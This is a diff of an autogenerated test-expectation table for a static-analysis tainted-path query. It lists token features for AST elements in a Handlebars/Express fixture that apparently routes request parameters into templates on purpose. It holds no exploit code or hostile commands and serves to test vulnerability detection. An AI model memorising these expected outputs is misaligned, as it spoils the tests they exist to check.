enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:46:33:51 | params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:46:33:51 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:46:33:51 | params | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:46:33:51 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:46:33:51 | params | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:53:33:56 | name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:53:33:56 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:53:33:56 | name | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:53:33:56 | name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:53:33:56 | name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:1:36:3 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:1:36:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:1:36:3 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:1:36:7 | app.get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:1:36:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:1:36:7 | app.get | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | app.get ... ok)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | app.get ... ok)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | app.get ... ok)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | exceptional return of app.get ... ok)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | exceptional return of app.get ... ok)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:1:38:2 | exceptional return of app.get ... ok)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:5:36:7 | get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:5:36:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:5:36:7 | get | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | calleeImports | express | @@ -7218,6 +68323,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:36:9:36:21 | '/some/path3' | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | data | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | this | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:24:36:23 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | 'arguments' object of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | exceptional return of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | calleeImports | express | @@ -7225,6 +68350,66 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:36:24:38:1 | functio ... s ok)\\n} | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | return of anonymous function | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:24:38:1 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:34:36:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:36:39:36:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:5:37:7 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:7 | res | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:5:37:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:5:37:7 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:5:37:12 | res.send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:12 | res.send | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:5:37:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:5:37:12 | res.send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | exceptional return of res.sen ... ame })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | exceptional return of res.sen ... ame })) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | exceptional return of res.sen ... ame })) | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | exceptional return of res.sen ... ame })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | exceptional return of res.sen ... ame })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | res.sen ... ame })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | res.sen ... ame })) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | res.sen ... ame })) | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | res.sen ... ame })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:5:37:61 | res.sen ... ame })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:9:37:12 | send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:9:37:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:9:37:12 | send | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:9:37:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:9:37:12 | send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:14:37:17 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:14:37:17 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:14:37:17 | data | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:14:37:17 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:14:37:17 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:14:37:33 | data.compiledUnknown | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:14:37:33 | data.compiledUnknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:14:37:33 | data.compiledUnknown | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:14:37:33 | data.compiledUnknown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:14:37:33 | data.compiledUnknown | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | CalleeFlexibleAccessPath | res.send | | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7233,6 +68418,16 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:37:14:37:60 | data.co ... name }) | receiverName | res | +| autogenerated/TaintedPath/handlebars.js:37:14:37:60 | exceptional return of data.co ... name }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:14:37:60 | exceptional return of data.co ... name }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:37:14:37:60 | exceptional return of data.co ... name }) | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:14:37:60 | exceptional return of data.co ... name }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:14:37:60 | exceptional return of data.co ... name }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:19:37:33 | compiledUnknown | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:19:37:33 | compiledUnknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:19:37:33 | compiledUnknown | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:19:37:33 | compiledUnknown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:19:37:33 | compiledUnknown | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | CalleeFlexibleAccessPath | data.compiledUnknown | | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7241,6 +68436,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } | receiverName | data | +| autogenerated/TaintedPath/handlebars.js:37:37:37:40 | name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:37:37:40 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:37:37:40 | name | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:37:37:40 | name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:37:37:40 | name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:37:37:57 | name: r ... ms.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:43:37:45 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:43:37:45 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:43:37:45 | req | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:43:37:45 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:43:37:45 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:43:37:52 | req.params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:43:37:52 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:43:37:52 | req.params | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:43:37:52 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:43:37:52 | req.params | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | CalleeFlexibleAccessPath | data.compiledUnknown | | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | InputAccessPathFromCallee | 0.name | | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | InputArgumentIndex | 0 | @@ -7250,6 +68470,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | enclosingFunctionBody | req res res send data compiledUnknown name req params name | | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:47:37:52 | params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:47:37:52 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:47:37:52 | params | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:47:37:52 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:47:37:52 | params | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:37:54:37:57 | name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:37:54:37:57 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:37:54:37:57 | name | enclosingFunctionBody | req res res send data compiledUnknown name req params name | +| autogenerated/TaintedPath/handlebars.js:37:54:37:57 | name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:37:54:37:57 | name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:1:40:3 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:1:40:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:1:40:3 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:1:40:7 | app.get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:1:40:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:1:40:7 | app.get | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | app.get ... }));\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | app.get ... }));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | app.get ... }));\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | exceptional return of app.get ... }));\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | exceptional return of app.get ... }));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:1:45:2 | exceptional return of app.get ... }));\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:5:40:7 | get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:5:40:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:5:40:7 | get | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | calleeImports | express | @@ -7257,6 +68502,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:40:9:40:21 | '/some/path4' | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | data | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | this | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:24:40:23 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | 'arguments' object of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | exceptional return of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | calleeImports | express | @@ -7264,6 +68529,66 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:40:24:45:1 | functio ... }));\\n} | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | return of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:24:45:1 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:34:40:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | contextFunctionInterfaces | 